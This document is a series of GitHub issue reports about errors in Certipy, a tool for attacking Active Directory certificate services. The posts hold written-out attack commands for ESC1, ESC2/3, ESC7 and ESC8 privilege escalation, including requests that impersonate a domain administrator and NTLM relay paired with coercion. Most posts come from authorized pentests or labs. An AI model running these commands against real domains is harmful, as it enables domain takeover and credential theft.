Hello!

Certipy has identified a number of templates in this environment vulnerable to ESC1. I've done:

certipy req 'victim.domain/[email protected]' -ca 'CA-NAME' -template 'VULNERABLETEMPLATE' -k -no-pass -alt '[email protected]'

I got a domainadmin.pfx and I'm ready to test it out.

When I do certipy auth -pfx domainadmin.pfx -dc-ip ip.of.domain.controller I get:

[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Upon checking this repo's issues, I came across this one leading me to believe I can use this blog/tool to abuse this path via Linux, but from your blog it's my understanding that if the CA is fully patched, this is a dead end.

To further confuse me, this blog makes me think abuse still is possible, but this content looks to be specifically about abuse when you've obtained the cert for a domain controller (which I have not).

Would you point me in the right direction - just so I'm not chasing a dead end?

error: Setup script exited with error: SandboxViolation: mkdir('/private/var/root/Library/Caches/com.apple.python/private/tmp/easy_install-qii5l5tu', 511) {}

I am attempting to perform a certificate request using the current version of certipy.

I've ran the setup and did not see any issues/errors.

When attempting the req I am getting a error concerning the request attribute.

Below is the output from the command as well as the output from the command with the suggested -debug option.

============================

[email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' [-] Use -debug to print a stacktrace

===========================

[email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User -debug Certipy v3.0.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'dc3' at '192.168.202.2' [+] Generating RSA key [*] Requesting certificate [+] Trying to connect to endpoint: ncacn_np:192.168.0.31[\pipe\cert] [!] Failed to connect to endpoint ncacn_np:192.168.0.31[\pipe\cert]: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.) [+] Trying to resolve dynamic endpoint 'redacted' [+] Failed to resolve dynamic endpoint 'redacted' [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/entry.py", line 85, in main actionsoptions.action File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 334, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 256, in request response = self.dce.request(request) AttributeError: 'NoneType' object has no attribute 'request'

When attemting to exploit ESC7 and the account I use for authentication does not have the right Manage Certificates, I must add that account as a new officer in order to grant the account that right. This fails for me using Certipy 2.0.6.

Once this works, can I delete/remove the officer and possibly other remaining changes after the attack?

Hello,

I have cloned the repo using the command

git clone https://github.com/ly4k/Certipy.git

I then cd'd into the Certipy directory and ran the command

sudo python3 /path/to/Certipy/setup.py install

I am trying to execute the basic certipy find command and I am getting an error regarding unrecognized commands

The command that I am executing is:

certipy find "fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress"

After running the command I am getting the error message

Certipy v4.0.0 - by Oliver Lyak (ly4k)

usage: certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
certipy: error: unrecognized arguments: fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress

I have been to the blog post and read through it but no luck- https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6

All documentation that I am seeing is on version 2. Could this be a version 4 issue?

Thanks!

Hello!

I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

certipy 'NETBIOS-NAME-OF-DOMAIN/[email protected]' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'

When this runs, I get:

[+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
[+] Connecting to SMB at 'VULN-CA-SERVER' 
[+] Using Kerberos Cache: regularuser.ccache
[+] SPN CIFS/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache.

This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

Thanks, Brian

Hello!

I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

I setup Certipy in one window as follows:

certipy relay -ca ca.domain.com

In another window I did Coercer with:

coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

In the Certipy window I get:

Targeting http://ca.domain.com/certsrv/certfnsh.asp
Listening on 0.0.0.0:445
Requesting certificate for 'DOMAIN\\DC$' based on the template "Machine'
Request ID is 123
Would you like to save the private key? (y/N)

It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

Any help pointing me in the right direction to troubleshoot would be much appreciated!

Thanks, Brian

An error occurred while requesting a certificate using a domain user I am using version 4.0 This is the command I used：certipy req -username [email protected] -p Passowrd! -ca test-DC01-CA -template User -target 173.100.4.60 -debug The following is the error report: [+] Trying to connect to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [proxychains] Strict chain ... 192.168.172.130:1080 ... 173.100.4.60:445 ... OK [+] Connected to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/entry.py", line 60, in main actions[options.action](options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/parsers/req.py", line 12, in entry req.entry(options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 764, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 715, in request cert = self.interface.request(csr, attributes) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 208, in request response = self.dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220502.112312.90866d4c-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request raise exception

Hello,

I'm using certipy on a pentest where my AD account password has '#' in it. When I run a 'certipy find' I get the below error in the output. I am running the latest/greatest certipy on 2 different pentests right now, and on the pentest where my password is just upper/lower/numbers (and a special character that is not a '#'), certipy runs fine.

[*] Finding certificate templates
[+] Authenticating to LDAP server
[-] Got error: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
Traceback (most recent call last):
  File "/usr/lib/python3.10/hashlib.py", line 160, in __hash_new
    return _hashlib.new(name, data, **kwargs)
ValueError: [digital envelope routines] unsupported

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
    password_digest = hashlib.new('MD4', self._password.encode('utf-16-le')).digest()
  File "/usr/lib/python3.10/hashlib.py", line 166, in __hash_new
    return __get_builtin_constructor(name)(data)
  File "/usr/lib/python3.10/hashlib.py", line 123, in __get_builtin_constructor
    raise ValueError('unsupported hash type ' + name)
ValueError: unsupported hash type MD4

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/entry.py", line 85, in main
    actions[options.action](options)
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 736, in entry
    find.find()
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 116, in find
    certificate_templates = self.get_certificate_templates()
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 691, in get_certificate_templates
    certificate_templates = self.connection.search(
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 109, in connection
    self._connection.connect()
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 53, in connect
    self.connect(version=ssl.PROTOCOL_TLSv1_2)
  File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 100, in connect
    bind_result = ldap_conn.bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 621, in bind
    response = self.do_ntlm_bind(controls)
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1388, in do_ntlm_bind
    request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client,
  File "/usr/lib/python3/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
    server_creds = name.create_authenticate_message()
  File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
    nt_challenge_response = self.compute_nt_response()
  File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
    response_key_nt = self.ntowf_v2()
  File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 501, in ntowf_v2
    password_digest = MD4.new(self._password.encode('utf-16-le')).digest()
SystemError: PY_SSIZE_T_CLEAN macro must be defined for '#' formats

Hi there, I got introduced to Certipy via the TryHackMe room CVE-2022-26923. I installed the latest version of Certipy via PyPI.

The request module successfully saves a certificate to local storage.

When I tried to use the certificate for authentication, I got an ImportError.

The same command using Certipy version 2.0.9 with the same certificate does work.

I am using a dockerized Kali with Python 3.10 on an aarch64 machine.

[*] Requesting certificate [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. [-] Use -debug to print a stacktrace

Has the boss ever reported this error

Hi,

Again, thank you for this tool!

I recently stumbled upon this article about relaying NTLM to ICPR by Compass Security using a CA which has "IF_ENFORCEENCRYPTICERTREQUEST" disabled. They have dubbed it ESC11. They use a fork of Certipy for identification of vulnerable CAs and a fork of Impacket to abuse them. I can see that there is a PR (105) for the identification part but there isn't one for the abuse part. Would you consider supporting ESC11? Both the identification and abuse parts.

Thanks!

Hi!

If there's any interest in a dockerized version, I've created a Dockerfile and edited the README with instructions. I hit some dependency snags when working with Certipy and sought to solve them with Docker. The dockerfile is derived from the dockerfiles of Impacket and CrackMapExec.

The mounted volume is good for collecting all of the artifacts. You should also still be able to publish a port for certipy relay but I have not tested that yet.

This set up may need some testing to make sure it works in all use cases but so far so good for me! (Tested w. ESC1, 2, 3, Golden Certificate)

At the moment, Certipy is not compatible with Python 3.11.

This is because it uses the undocumented _decompose function of the enum module, which apparently got removed in Python 3.11. When running under this version of Python, the following error is shown:

AttributeError: module 'enum' has no attribute '_decompose'

The problematic function calls are in certipy/lib/structs.py and certipy/lib/constants.py.

Hello,

I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.

First off i'll fetch the "Any purpose" EKU (ESC2/3) template:

/usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x

Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template User on behalt of the Administrator.

/usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 114
Would you like to save the private key? (y/N)

I get the same error when i try to renew the initial test.pfx certificate.

/usr/local/bin/certipy req -renew  -u [email protected] -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
[*] Request ID is 115
Would you like to save the private key? (y/N)

The ESC2/3 privesc works fine from certify.exe from a domain joined windows box.

I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 that might be wrong however i'm not successful.

I'm on the latest 92592c59acf50e5db3ace2947680614c110aff82 commit.

This makes it work in my test env. If you cant add a machine for example. The others I did not investigate fully, but the try/catch makes certipy at least not fully crash

When performing a basic NTLM relay attack (with PetitPotam to coerce auth) using the "relay" command, everything goes fine as you see below:

The PFX is saved and no error is thrown. However, when you follow this up with a certipy auth as below, a Kerberos error is thrown upon requesting the TGT:

However, requesting the TGT and NTLM hash with Rubeus works just as expected:

And then I was able to DC Sync with CME using the NTLM hash and/or TGT:

The DC involved is a Windows Server 2022 and the CA, on a separate server specifically to facilitate the NTLM relay simulation, is Windows Server 2019. I suspect this may be an issue related to the super up-to-date version of Windows Server that the DC is running on; perhaps Certipy just hasn't been updated to cope with it yet but Rubeus has (it receives more regular updates). Any idea is appreciated, though!